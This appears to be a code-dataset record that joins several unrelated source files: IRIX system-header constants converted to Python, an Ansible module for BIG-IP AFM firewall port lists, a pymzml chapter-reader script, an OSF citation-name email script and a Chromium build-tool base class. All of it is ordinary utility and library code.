BRK_CACHE_SYNC = 0x80
BRK_MULOVF = 1023
_POSIX_VERSION = 199506L
_POSIX_VERSION = 199506
_POSIX_VDISABLE = 0
MAX_INPUT = 512
MAX_CANON = 256
UID_NOBODY = 60001
GID_NOBODY = UID_NOBODY
UID_NOACCESS = 60002
MAXPID = 0x7ffffff0
MAXUID = 0x7fffffff
MAXLINK = 30000
SSIZE = 1
SINCR = 1
KSTKSIZE = 1
EXTKSTKSIZE = 1
KSTKIDX = 0
KSTEIDX = 1
EXTKSTKSIZE = 0
KSTKIDX = 0
CANBSIZ = 256
HZ = 100
TICK = 10000000
NOFILE = 20
NGROUPS_UMIN = 0
NGROUPS_UMAX = 32
NGROUPS = 16
PMASK = 0177
PCATCH = 0400
PLTWAIT = 01000
PRECALC = 01000
PSWP = 0
PINOD = 10
PSNDD = PINOD
PRIBIO = 20
PZERO = 25
PMEM = 0
NZERO = 20
PPIPE = 26
PVFS = 27
PWAIT = 30
PSLEP = 39
PUSER = 60
PBATCH_CRITICAL = -1
PTIME_SHARE = -2
PTIME_SHARE_OVER = -3
PBATCH = -4
PWEIGHTLESS = -5
IO_NBPC = 4096
IO_BPCSHIFT = 12
MIN_NBPC = 4096
MIN_BPCSHIFT = 12
MIN_CPSSHIFT = 10
BPCSHIFT = 12
CPSSHIFT = 10
BPCSHIFT = 14
CPSSHIFT = 12
CPSSHIFT = 11
BPSSHIFT = (BPCSHIFT+CPSSHIFT)
NULL = 0L
CMASK = 022
NODEV = (-1)
NOPAGE = (-1)
NBPSCTR = 512
SCTRSHFT = 9
def BASEPRI(psw): return (((psw) & SR_IMASK) == SR_IMASK0)
def BASEPRI(psw): return (((psw) & SR_IMASK) == SR_IMASK)
def USERMODE(psw): return (((psw) & SR_KSU_MSK) == SR_KSU_USR)
MAXPATHLEN = 1024
MAXSYMLINKS = 30
MAXNAMELEN = 256
PIPE_BUF = 10240
PIPE_MAX = 10240
NBBY = 8
BBSHIFT = 9
BBSIZE = (1<<BBSHIFT)
BBMASK = (BBSIZE-1)
def BBTOB(bbs): return ((bbs) << BBSHIFT)
def OFFTOBB(bytes): return (((__uint64_t)(bytes) + BBSIZE - 1) >> BBSHIFT)
def OFFTOBBT(bytes): return ((off_t)(bytes) >> BBSHIFT)
def BBTOOFF(bbs): return ((off_t)(bbs) << BBSHIFT)
SEEKLIMIT32 = 0x7fffffff
MAXBSIZE = 8192
DEV_BSIZE = BBSIZE
DEV_BSHIFT = BBSHIFT
# The h2py conversion left these two macros as dangling ``return \``
# stubs (a syntax error). Restore the conventional byte <-> 512-byte
# disk-block conversions; DEV_BSHIFT (== BBSHIFT == 9) is defined above.
def btodb(bytes): return bytes >> DEV_BSHIFT
def dbtob(db): return db << DEV_BSHIFT
BLKDEV_IOSHIFT = BPCSHIFT
BLKDEV_IOSIZE = (1<<BLKDEV_IOSHIFT)
def BLKDEV_OFF(off): return ((off) & (BLKDEV_IOSIZE - 1))
def BLKDEV_LBN(off): return ((off) >> BLKDEV_IOSHIFT)
def BLKDEV_LTOP(bn): return ((bn) * BLKDEV_BB)
MAXHOSTNAMELEN = 256
def DELAY(n): return us_delay(n)
def DELAYBUS(n): return us_delaybus(n)
TIMEPOKE_NOW = -100L
MUTEX_DEFAULT = 0x0
METER_NAMSZ = 16
METER_NO_SEQ = -1
def mutex_spinlock(l): return splhi()
def mutex_spintrylock(l): return splhi()
def spinlock_initialized(l): return 1
SV_FIFO = 0x0
SV_LIFO = 0x2
SV_PRIO = 0x4
SV_KEYED = 0x6
SV_DEFAULT = SV_FIFO
SEMA_NOHIST = 0x0001
SEMA_LOCK = 0x0004
NSCHEDCLASS = (-(PWEIGHTLESS)+1)
MR_ACCESS = 1
MR_UPDATE = 2
MRLOCK_BARRIER = 0x1
MRLOCK_BEHAVIOR = 0x2
MRLOCK_DBLTRIPPABLE = 0x4
MRLOCK_ALLOW_EQUAL_PRI = 0x8
MRLOCK_DEFAULT = MRLOCK_BARRIER
def mraccess(mrp): return mraccessf(mrp, 0)
def mrupdate(mrp): return mrupdatef(mrp, 0)
def mp_mutex_unlock(m): return mutex_unlock(m)
def mp_mutex_trylock(m): return mutex_trylock(m)
def mp_mutex_spinlock(m): return mutex_spinlock(m)
# Included from sys/mon.h
MON_LOCKED = 0x01
MON_WAITING = 0x02
MON_TIMEOUT = 0x04
MON_DOSRV = 0x08
MON_RUN = 0x10
MR_READER_BUCKETS = 13
def initlock(l): return spinlock_init(l,0)
def ownlock(x): return 1
def mutex_enter(m): return mutex_lock(m, PZERO)
def mutex_tryenter(m): return mutex_trylock(m)
def mutex_exit(m): return mutex_unlock(m)
def cv_signal(cv): return sv_signal(cv)
def cv_broadcast(cv): return sv_broadcast(cv)
def cv_destroy(cv): return sv_destroy(cv)
RW_READER = MR_ACCESS
RW_WRITER = MR_UPDATE
def rw_exit(r): return mrunlock(r)
def rw_tryupgrade(r): return mrtrypromote(r)
def rw_downgrade(r): return mrdemote(r)
def rw_destroy(r): return mrfree(r)
def RW_WRITE_HELD(r): return ismrlocked(r, MR_UPDATE)
def RW_READ_HELD(r): return ismrlocked(r, MR_ACCESS)
MS_FREE = 0
MS_UPD = 1
MS_ACC = 2
MS_WAITERS = 4
# Included from sys/fcntl.h
FNDELAY = 0x04
FAPPEND = 0x08
FSYNC = 0x10
FDSYNC = 0x20
FRSYNC = 0x40
FNONBLOCK = 0x80
FASYNC = 0x1000
FLARGEFILE = 0x2000
FNONBLK = FNONBLOCK
FDIRECT = 0x8000
FBULK = 0x10000
FDIRENT64 = 0x8000
FCREAT = 0x0100
FTRUNC = 0x0200
FEXCL = 0x0400
FNOCTTY = 0x0800
O_RDONLY = 0
O_WRONLY = 1
O_RDWR = 2
O_NDELAY = 0x04
O_APPEND = 0x08
O_SYNC = 0x10
O_DSYNC = 0x20
O_RSYNC = 0x40
O_NONBLOCK = 0x80
O_LARGEFILE = 0x2000
O_DIRECT = 0x8000
O_BULK = 0x10000
O_CREAT = 0x100
O_TRUNC = 0x200
O_EXCL = 0x400
O_NOCTTY = 0x800
F_DUPFD = 0
F_GETFD = 1
F_SETFD = 2
F_GETFL = 3
F_SETFL = 4
F_SETLK = 6
F_SETLKW = 7
F_CHKFL = 8
F_ALLOCSP = 10
F_FREESP = 11
F_SETBSDLK = 12
F_SETBSDLKW = 13
F_GETLK = 14
F_CHKLK = 15
F_CHKLKW = 16
F_CLNLK = 17
F_RSETLK = 20
F_RGETLK = 21
F_RSETLKW = 22
F_GETOWN = 23
F_SETOWN = 24
F_DIOINFO = 30
F_FSGETXATTR = 31
F_FSSETXATTR = 32
F_GETLK64 = 33
F_SETLK64 = 34
F_SETLKW64 = 35
F_ALLOCSP64 = 36
F_FREESP64 = 37
F_GETBMAP = 38
F_FSSETDM = 39
F_RESVSP = 40
F_UNRESVSP = 41
F_RESVSP64 = 42
F_UNRESVSP64 = 43
F_GETBMAPA = 44
F_FSGETXATTRA = 45
F_SETBIOSIZE = 46
F_GETBIOSIZE = 47
F_GETOPS = 50
F_DMAPI = 51
F_FSYNC = 52
F_FSYNC64 = 53
F_GETBDSATTR = 54
F_SETBDSATTR = 55
F_GETBMAPX = 56
F_SETPRIO = 57
F_GETPRIO = 58
F_RDLCK = 01
F_WRLCK = 02
F_UNLCK = 03
O_ACCMODE = 3
FD_CLOEXEC = 1
FD_NODUP_FORK = 4
BMV_IF_ATTRFORK = 0x1
BMV_IF_NO_DMAPI_READ = 0x2
BMV_IF_PREALLOC = 0x4
BMV_IF_VALID = (BMV_IF_ATTRFORK|BMV_IF_NO_DMAPI_READ|BMV_IF_PREALLOC)
BMV_OF_PREALLOC = 0x1
BMV_IF_EXTENDED = 0x40000000
FMASK = 0x190FF
FOPEN = 0xFFFFFFFF
FREAD = 0x01
FWRITE = 0x02
FNDELAY = 0x04
FAPPEND = 0x08
FSYNC = 0x10
FDSYNC = 0x20
FRSYNC = 0x40
FNONBLOCK = 0x80
FASYNC = 0x1000
FNONBLK = FNONBLOCK
FLARGEFILE = 0x2000
FDIRECT = 0x8000
FBULK = 0x10000
FCREAT = 0x0100
FTRUNC = 0x0200
FEXCL = 0x0400
FNOCTTY = 0x0800
FINVIS = 0x0100
FSOCKET = 0x0200
FINPROGRESS = 0x0400
FPRIORITY = 0x0800
FPRIO = 0x4000
FDIRENT64 = 0x8000
FCLOSEXEC = 0x01
LOCK_SH = 1
LOCK_EX = 2
LOCK_NB = 4
LOCK_UN = 8
L_SET = 0
L_INCR = 1
L_XTND = 2
F_OK = 0
X_OK = 1
W_OK = 2
R_OK = 4
| mit |
awkspace/ansible | lib/ansible/modules/network/f5/bigip_firewall_port_list.py | 14 | 19722 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_firewall_port_list
short_description: Manage port lists on BIG-IP AFM
description:
- Manages the AFM port lists on a BIG-IP. This module can be used to add
and remove port list entries.
version_added: 2.5
options:
name:
description:
- Specifies the name of the port list.
required: True
partition:
description:
- Device partition to manage resources on.
default: Common
description:
description:
- Description of the port list
ports:
description:
- Simple list of port values to add to the list
port_ranges:
description:
- A list of port ranges where the range starts with a port number, is followed
by a dash (-) and then a second number.
- If the first number is greater than the second number, the numbers will be
reversed so-as to be properly formatted. ie, 90-78 would become 78-90.
port_lists:
description:
- Simple list of existing port lists to add to this list. Port lists can be
specified in either their fully qualified name (/Common/foo) or their short
name (foo). If a short name is used, the C(partition) argument will automatically
be prepended to the short name.
state:
description:
- When C(present), ensures that the address list and entries exists.
- When C(absent), ensures the address list is removed.
default: present
choices:
- present
- absent
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Create a simple port list
bigip_firewall_port_list:
name: foo
ports:
- 80
- 443
state: present
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Override the above list of ports with a new list
bigip_firewall_port_list:
name: foo
ports:
- 3389
- 8080
- 25
state: present
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Create port list with series of ranges
bigip_firewall_port_list:
name: foo
port_ranges:
- 25-30
- 80-500
- 50-78
state: present
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Use multiple types of port arguments
bigip_firewall_port_list:
name: foo
port_ranges:
- 25-30
- 80-500
- 50-78
ports:
- 8080
- 443
state: present
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Remove port list
bigip_firewall_port_list:
name: foo
state: absent
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Create port list from a file with one port per line
bigip_firewall_port_list:
name: lot-of-ports
ports: "{{ lookup('file', 'my-large-port-list.txt').split('\n') }}"
state: present
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
description:
description: The new description of the port list.
returned: changed
type: str
sample: My port list
ports:
description: The new list of ports applied to the port list.
returned: changed
type: list
sample: [80, 443]
port_ranges:
description: The new list of port ranges applied to the port list.
returned: changed
type: list
sample: [80-100, 200-8080]
port_lists:
description: The new list of port list names applied to the port list.
returned: changed
type: list
sample: [/Common/list1, /Common/list2]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.icontrol import module_provisioned
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.icontrol import module_provisioned
class Parameters(AnsibleF5Parameters):
    """Shared attribute declarations for the port-list module parameters."""

    # Map of REST API attribute names to module argument names.
    api_map = {
        'portLists': 'port_lists',
    }
    # Attributes sent to the REST API on create/update.
    api_attributes = [
        'portLists', 'ports', 'description',
    ]
    # Attributes reported back to the user in the module result.
    returnables = [
        'ports', 'port_ranges', 'port_lists', 'description',
    ]
    # Attributes compared to decide whether an update is required.
    updatables = [
        'description', 'ports', 'port_ranges', 'port_lists',
    ]
class ApiParameters(Parameters):
    """Parameters as returned by the BIG-IP REST API."""

    @property
    def port_ranges(self):
        """Return 'start-stop' range strings, normalized low-to-high."""
        if self._values['ports'] is None:
            return None
        ranges = []
        for entry in self._values['ports']:
            name = entry['name']
            if '-' not in name:
                continue
            lo, hi = (int(part.strip()) for part in name.split('-'))
            if lo > hi:
                lo, hi = hi, lo
            ranges.append('{0}-{1}'.format(lo, hi))
        return ranges

    @property
    def port_lists(self):
        """Return referenced port lists as fully qualified '/partition/name' strings."""
        if self._values['port_lists'] is None:
            return None
        return [
            '/{0}/{1}'.format(entry['partition'], entry['name'])
            for entry in self._values['port_lists']
        ]

    @property
    def ports(self):
        """Return the single (non-range) port entries as integers."""
        if self._values['ports'] is None:
            return None
        return [
            int(entry['name'])
            for entry in self._values['ports'] if '-' not in entry['name']
        ]
class ModuleParameters(Parameters):
    """Parameters supplied by the user in the Ansible task."""

    @property
    def ports(self):
        """Return the list of single ports as integers.

        Raises F5ModuleError when an entry is a range or falls outside
        the valid port range 0-65535.
        """
        if self._values['ports'] is None:
            return None
        if any(x for x in self._values['ports'] if '-' in str(x)):
            raise F5ModuleError(
                "Ports must be whole numbers between 0 and 65,535"
            )
        # BUGFIX: the original chained comparison ``0 < int(x) > 65535``
        # only rejected values above 65535, silently accepting negative
        # ports. Validate the full inclusive range instead.
        if any(x for x in self._values['ports'] if not 0 <= int(x) <= 65535):
            raise F5ModuleError(
                "Ports must be whole numbers between 0 and 65,535"
            )
        result = [int(x) for x in self._values['ports']]
        return result

    @property
    def port_ranges(self):
        """Return normalized 'low-high' range strings.

        Entries without a dash are skipped; bounds are swapped when given
        high-to-low, and each bound must lie within 0-65535.
        """
        if self._values['port_ranges'] is None:
            return None
        result = []
        for port_range in self._values['port_ranges']:
            if '-' not in port_range:
                continue
            start, stop = port_range.split('-')
            start = int(start.strip())
            stop = int(stop.strip())
            if start > stop:
                stop, start = start, stop
            # BUGFIX: same chained-comparison problem as ``ports`` above;
            # reject anything outside the inclusive 0-65535 range.
            if not (0 <= start <= 65535 and 0 <= stop <= 65535):
                raise F5ModuleError(
                    "Ports must be whole numbers between 0 and 65,535"
                )
            item = '{0}-{1}'.format(start, stop)
            result.append(item)
        return result

    @property
    def port_lists(self):
        """Return referenced port lists as fully qualified names."""
        if self._values['port_lists'] is None:
            return None
        result = []
        for x in self._values['port_lists']:
            item = fq_name(self.partition, x)
            result.append(item)
        return result
class Changes(Parameters):
    # Thin wrapper that knows how to serialize its parameters for reporting.
    def to_return(self):
        """Return a dict of all 'returnable' attributes, filtered of Nones.

        Any exception raised while resolving an attribute is deliberately
        swallowed so that a partially-populated change set still reports
        whatever could be computed.
        """
        result = {}
        try:
            for returnable in self.returnables:
                result[returnable] = getattr(self, returnable)
            result = self._filter_params(result)
        except Exception:
            pass
        return result
class ReportableChanges(Changes):
    """Re-shapes API-formatted change data for user-facing reporting."""
    @property
    def ports(self):
        # Single ports only; range entries are reported via ``port_ranges``.
        return [entry['name'] for entry in self._values['ports']
                if '-' not in entry['name']]
    @property
    def port_ranges(self):
        # Range entries only (names containing a '-').
        return [entry['name'] for entry in self._values['ports']
                if '-' in entry['name']]
class UsableChanges(Changes):
    """Re-shapes user-supplied changes into the structures the API expects."""
    @property
    def ports(self):
        if self._values['ports'] is None and self._values['port_ranges'] is None:
            return None
        # The values of the 'name' keys literally need to be string values.
        # If they are not, BIG-IP 12.1.0 rejects the request with:
        #
        # {
        #   "code": 400,
        #   "message": "one or more configuration identifiers must be provided",
        #   "errorStack": [],
        #   "apiError": 26214401
        # }
        collected = []
        for key in ('ports', 'port_ranges'):
            values = self._values[key]
            if values:
                collected.extend(dict(name=str(value)) for value in values)
        return collected
    @property
    def port_lists(self):
        if self._values['port_lists'] is None:
            return None
        items = []
        for fq in self._values['port_lists']:
            # Split "/partition/name" into its two components.
            partition, name = fq.split('/')[1:]
            items.append(dict(
                name=name,
                partition=partition
            ))
        return items
class Difference(object):
    """Computes which attributes differ between desired and current state."""
    def __init__(self, want, have=None):
        self.want = want
        self.have = have
    def compare(self, param):
        # Prefer a parameter-specific comparator property when one exists;
        # otherwise fall back to the plain inequality check.
        try:
            return getattr(self, param)
        except AttributeError:
            return self.__default(param)
    def __default(self, param):
        wanted = getattr(self.want, param)
        try:
            current = getattr(self.have, param)
            if wanted != current:
                return wanted
        except AttributeError:
            return wanted
    def _sorted_diff(self, attribute):
        # Order-insensitive comparison shared by the list-valued attributes.
        wanted = getattr(self.want, attribute)
        if wanted is None:
            return None
        current = getattr(self.have, attribute)
        if current is None:
            return wanted
        if sorted(wanted) != sorted(current):
            return wanted
    @property
    def ports(self):
        return self._sorted_diff('ports')
    @property
    def port_lists(self):
        return self._sorted_diff('port_lists')
    @property
    def port_ranges(self):
        return self._sorted_diff('port_ranges')
class ModuleManager(object):
    """Drives the create/update/delete lifecycle of an AFM port-list resource."""
    def __init__(self, *args, **kwargs):
        self.module = kwargs.get('module', None)
        self.client = kwargs.get('client', None)
        # 'want' is the user-requested state, 'have' the device state (lazily
        # populated), and 'changes' the computed delta to apply/report.
        self.want = ModuleParameters(params=self.module.params)
        self.have = ApiParameters()
        self.changes = UsableChanges()
    def _set_changed_options(self):
        # On create, every user-supplied returnable becomes a change.
        changed = {}
        for key in Parameters.returnables:
            if getattr(self.want, key) is not None:
                changed[key] = getattr(self.want, key)
        if changed:
            self.changes = UsableChanges(params=changed)
    def _update_changed_options(self):
        """Diff desired vs. device state; return True if anything differs."""
        diff = Difference(self.want, self.have)
        updatables = Parameters.updatables
        changed = dict()
        for k in updatables:
            change = diff.compare(k)
            if change is None:
                continue
            else:
                if isinstance(change, dict):
                    changed.update(change)
                else:
                    changed[k] = change
        if changed:
            self.changes = UsableChanges(params=changed)
            return True
        return False
    def should_update(self):
        result = self._update_changed_options()
        if result:
            return True
        return False
    def exec_module(self):
        """Entry point: apply the requested state and build the result dict.

        Raises F5ModuleError when the AFM module is not provisioned on the
        target device.
        """
        if not module_provisioned(self.client, 'afm'):
            raise F5ModuleError(
                "AFM must be provisioned to use this module."
            )
        changed = False
        result = dict()
        state = self.want.state
        if state == "present":
            changed = self.present()
        elif state == "absent":
            changed = self.absent()
        reportable = ReportableChanges(params=self.changes.to_return())
        changes = reportable.to_return()
        result.update(**changes)
        result.update(dict(changed=changed))
        self._announce_deprecations(result)
        return result
    def _announce_deprecations(self, result):
        # Surface any queued deprecation warnings through Ansible's channel.
        warnings = result.pop('__warnings', [])
        for warning in warnings:
            self.module.deprecate(
                msg=warning['msg'],
                version=warning['version']
            )
    def present(self):
        if self.exists():
            return self.update()
        else:
            return self.create()
    def absent(self):
        if self.exists():
            return self.remove()
        return False
    def update(self):
        self.have = self.read_current_from_device()
        if not self.should_update():
            return False
        # In check mode, report that a change would occur without making it.
        if self.module.check_mode:
            return True
        self.update_on_device()
        return True
    def remove(self):
        if self.module.check_mode:
            return True
        self.remove_from_device()
        # Verify the deletion actually took effect on the device.
        if self.exists():
            raise F5ModuleError("Failed to delete the resource.")
        return True
    def create(self):
        self._set_changed_options()
        if self.module.check_mode:
            return True
        self.create_on_device()
        return True
    def exists(self):
        """Return True if the port-list already exists on the device."""
        uri = "https://{0}:{1}/mgmt/tm/security/firewall/port-list/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError:
            return False
        if resp.status == 404 or 'code' in response and response['code'] == 404:
            return False
        return True
    def update_on_device(self):
        """PATCH the computed changes onto the existing resource."""
        params = self.changes.api_params()
        uri = "https://{0}:{1}/mgmt/tm/security/firewall/port-list/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        resp = self.client.api.patch(uri, json=params)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
    def read_current_from_device(self):
        """GET the resource and wrap the JSON payload in ApiParameters."""
        uri = "https://{0}:{1}/mgmt/tm/security/firewall/port-list/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
        return ApiParameters(params=response)
    def create_on_device(self):
        """POST a new resource built from the pending changes."""
        params = self.changes.api_params()
        params['name'] = self.want.name
        params['partition'] = self.want.partition
        uri = "https://{0}:{1}/mgmt/tm/security/firewall/port-list/".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
        )
        resp = self.client.api.post(uri, json=params)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] in [400, 403]:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
        return response['selfLink']
    def remove_from_device(self):
        """DELETE the resource; raise on any non-200 response."""
        uri = "https://{0}:{1}/mgmt/tm/security/firewall/port-list/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        response = self.client.api.delete(uri)
        if response.status == 200:
            return True
        raise F5ModuleError(response.content)
class ArgumentSpec(object):
    """Defines the arguments this Ansible module accepts."""
    def __init__(self):
        self.supports_check_mode = True
        # Module-specific arguments are merged on top of the common F5 set.
        module_args = dict(
            name=dict(required=True),
            description=dict(),
            ports=dict(type='list'),
            port_ranges=dict(type='list'),
            port_lists=dict(type='list'),
            partition=dict(
                default='Common',
                fallback=(env_fallback, ['F5_PARTITION'])
            ),
            state=dict(
                default='present',
                choices=['present', 'absent']
            )
        )
        self.argument_spec = {}
        self.argument_spec.update(f5_argument_spec)
        self.argument_spec.update(module_args)
def main():
    """Module entry point: build the spec, run the manager, exit via Ansible."""
    spec = ArgumentSpec()
    module = AnsibleModule(
        argument_spec=spec.argument_spec,
        supports_check_mode=spec.supports_check_mode
    )
    client = F5RestClient(**module.params)
    try:
        mm = ModuleManager(module=module, client=client)
        results = mm.exec_module()
        cleanup_tokens(client)
        exit_json(module, results, client)
    except F5ModuleError as ex:
        # Always release the API token, even on failure, before reporting.
        cleanup_tokens(client)
        fail_json(module, ex, client)
if __name__ == '__main__':
    main()
| gpl-3.0 |
StSchulze/pymzML | pymzml/utils/read_moby_dick.py | 2 | 2003 | #!/usr/bin/env python3
"""
Show chapter x of indexed gzipped moby dick
Usage:
python read_moby_dick.py <Chapter>
"""
# Python mzML module - pymzml
# Copyright (C) 2010-2019 M. Kösters, C. Fufezan
# The MIT License (MIT)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from GSGR import GSGR
import sys
import time
# Reader over the pre-indexed, gzipped copy of Moby Dick; created at import
# time so the __main__ block below can seek directly to individual chapters.
my_Reader = GSGR("./Moby_Dick_indexed.gz")
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(__doc__)
    else:
        # Accept either a numeric chapter index or a named block key.
        try:
            chap_num = int(sys.argv[1])
        except:
            chap_num = sys.argv[1]
        print(
            """
Reading indexed gzip and retrieving chapter {0}
""".format(
                chap_num
            )
        )
        s = time.time()
        print(
            """{0}
Took {1:.5f} seconds to retrieve chapter
""".format(
                my_Reader.read_block(chap_num), time.time() - s
            )
        )
| mit |
petermalcolm/osf.io | scripts/impute_names.py | 64 | 2374 | """
Email users to verify citation information.
"""
import re
import logging
from framework.auth.utils import impute_names
from framework.email.tasks import send_email
from website.app import init_app
from website import models
app = init_app('website.settings', set_backends=True, routes=True)
logging.basicConfig(filename='impute_names.log', level=logging.DEBUG)
email_template = u'''Hello, {fullname},
Along with a shorter domain name (http://osf.io), the Open Science Framework
has recently introduced a citation widget on project and component dashboards.
As such, we are expanding user settings to include Citation Style Language name
specifications that will allow us to accurately produce these citations. Your full
name can be different than the parts of the name used in citations.
Based upon your full name, "{fullname}", we've done our best to automatically infer the following:
Given name: {given_name}
Middle name(s): {middle_names}
Family name: {family_name}
Suffix: {suffix}
If this information is correct, you don't need to do anything. If you'd like
to make an adjustment or test the parsing algorithm, please browse to
http://osf.io/settings
If you have any questions or comments, please contact us at feedback+citations@osf.io (don't reply to this email).
I remain,
Sincerely yours,
The OSF Robot.
'''
def clean_template(template):
    """Collapse a hard-wrapped template into reflowed text.

    Non-empty lines are joined directly (unwrapping paragraphs), each blank
    line contributes a single newline, and runs of spaces are squeezed to
    one space.
    """
    pieces = [line if line else '\n' for line in template.splitlines()]
    return re.sub(' +', ' ', ''.join(pieces))
email_template = clean_template(email_template)
def email_name(user):
    """Send the citation-verification email to a single user.

    Imputes given/middle/family/suffix name parts from the user's full name
    and mails the filled-in template; logs success or failure.
    """
    logging.debug('Emailing user {0}'.format(user.fullname))
    names = {'fullname': user.fullname}
    names.update(impute_names(user.fullname))
    message=email_template.format(**names).encode('utf-8')
    success = send_email(
        from_addr='openscienceframework-robot@osf.io',
        to_addr=user.username,
        subject='Open Science Framework: Verify your citation information',
        message=message,
        mimetype='plain',
    )
    if success:
        logging.debug('Emailing user {0}: Success'.format(user.fullname))
    else:
        logging.debug('Emailing user {0}: Failure'.format(user.fullname))
def email_names():
    """Send the verification email to every user in the database."""
    for user in models.User.find():
        email_name(user)
#if __name__ == '__main__':
# impute_names('names.tsv')
| apache-2.0 |
s20121035/rk3288_android5.1_repo | external/chromium_org/tools/cr/cr/actions/builder.py | 71 | 2484 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A module for the Builder base class."""
import difflib
import cr
class Builder(cr.Action, cr.Plugin.Type):
  """Base class for implementing builders.

  Builder implementations must override the Build and Clean methods at a
  minimum to build a target and clean up back to a pristine state respectively.
  They can also override Rebuild if they are able to handle it in a more
  efficient way that a Clean Build sequence.

  They should override the GetTargets method to return the set of valid targets
  the build system knows about, and override IsTarget if they can implement it
  more efficiently than checking from presents in the result of GetTargets.
  """
  # Command-line flag / environment variable used to select the builder.
  SELECTOR_ARG = '--builder'
  SELECTOR = 'CR_BUILDER'
  SELECTOR_HELP = 'Sets the builder to use to update dependencies.'
  @cr.Plugin.activemethod
  def Build(self, targets, arguments):
    # Build the given targets; must be supplied by concrete builders.
    raise NotImplementedError('Must be overridden.')
  @cr.Plugin.activemethod
  def Clean(self, targets, arguments):
    """Clean temporary files built by a target."""
    raise NotImplementedError('Must be overridden.')
  @cr.Plugin.activemethod
  def Rebuild(self, targets, arguments):
    """Make a target build even if it is up to date.

    Default implementation is to do a Clean and Build sequence.
    Do not call the base version if you implement a more efficient one.
    """
    self.Clean(targets, [])
    self.Build(targets, arguments)
  @cr.Plugin.activemethod
  def GetTargets(self):
    """Gets the full set of targets supported by this builder.

    Used in automatic target name transformations, and also in offering the
    user choices.
    """
    return []
  @cr.Plugin.activemethod
  def IsTarget(self, target_name):
    """Check if a target name is on the builder knows about."""
    return target_name in self.GetTargets()
  @cr.Plugin.activemethod
  def GuessTargets(self, target_name):
    """Returns a list of closest matching targets for a named target."""
    # difflib cutoff of 0.4 keeps only reasonably similar candidates.
    return difflib.get_close_matches(target_name, self.GetTargets(), 10, 0.4)
class SkipBuilder(Builder):
  """The "skip" version of a Builder, causes the build step to be skipped."""
  @property
  def priority(self):
    # Rank just below the base priority so real builders win when present.
    return super(SkipBuilder, self).priority - 1
  def Build(self, targets, arguments):
    # Intentionally a no-op: skipping the build step.
    pass
  def Clean(self, targets, arguments):
    # Intentionally a no-op: nothing was built, nothing to clean.
    pass
| gpl-3.0 |
